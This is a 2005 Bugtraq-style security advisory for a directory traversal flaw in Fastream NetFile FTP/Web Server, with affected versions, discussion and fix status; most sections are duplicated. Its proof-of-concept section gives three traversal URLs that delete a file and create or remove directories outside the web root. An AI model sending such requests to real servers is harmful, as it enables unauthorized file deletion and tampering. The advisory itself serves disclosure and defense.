Fastream NetFile FTP/Web Server Directory Traversal Variant Vulnerability
BID:13388
Info
Fastream NetFile FTP/Web Server Directory Traversal Variant Vulnerability
| Bugtraq ID: | 13388 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 26 2005 12:00AM |
| Updated: | Apr 26 2005 12:00AM |
| Credit: | Discovery credited to Chew Keong TAN <[email protected]>. |
| Vulnerable: |
Fastream NetFILE FTP/Web Server 7.1 Fastream NetFILE FTP/Web Server 6.7.5 Fastream NetFILE FTP/Web Server 6.7.3 Fastream NetFILE FTP/Web Server 6.7.2 .1085 Fastream NetFILE FTP/Web Server 6.5.1 .981 Fastream NetFILE FTP/Web Server 6.5.1 .980 |
| Not Vulnerable: |
Fastream NetFILE FTP/Web Server 7.5 Beta 7 |
Discussion
Fastream NetFile FTP/Web Server Directory Traversal Variant Vulnerability
The NetFile FTP/Web Server is reported prone to a directory traversal vulnerability due to insufficient sanitization of user-supplied data. This can allow an attacker to create, view, and delete arbitrary files outside the web root.
A similar issue was reported in BID 10658. The fix for that issue did not properly filter all directory traversal sequences.
This issue is addressed in NetFile version 7.5.0 Beta 7 and above.
The NetFile FTP/Web Server is reported prone to a directory traversal vulnerability due to insufficient sanitization of user-supplied data. This can allow an attacker to create, view, and delete arbitrary files outside the web root.
A similar issue was reported in BID 10658. The fix for that issue did not properly filter all directory traversal sequences.
This issue is addressed in NetFile version 7.5.0 Beta 7 and above.
Exploit / POC
Fastream NetFile FTP/Web Server Directory Traversal Variant Vulnerability
No exploit is required.
The following proof of concepts are available:
http://www.example.com/?command=delete&filename=.../..//a/.../yyy.txt
http://www.example.com/?command=mkdir&filename=.../..//a/.../testdir
http://www.example.com/?command=rmdir&filename=.../..//a/.../testdir
No exploit is required.
The following proof of concepts are available:
http://www.example.com/?command=delete&filename=.../..//a/.../yyy.txt
http://www.example.com/?command=mkdir&filename=.../..//a/.../testdir
http://www.example.com/?command=rmdir&filename=.../..//a/.../testdir
Solution / Fix
Fastream NetFile FTP/Web Server Directory Traversal Variant Vulnerability
Solution:
This vulnerability is reportedly addressed in Fastream NetFile FTP/Web Server 7.5.0 Beta 7, however, this has not been confirmed by Symantec. Users are advised to contact the vendor for information on obtaining a fixed version.
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
This vulnerability is reportedly addressed in Fastream NetFile FTP/Web Server 7.5.0 Beta 7, however, this has not been confirmed by Symantec. Users are advised to contact the vendor for information on obtaining a fixed version.
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Fastream NetFile FTP/Web Server Directory Traversal Variant Vulnerability
References:
References:
- Fastream NETFile FTP/Web Server (Fastream)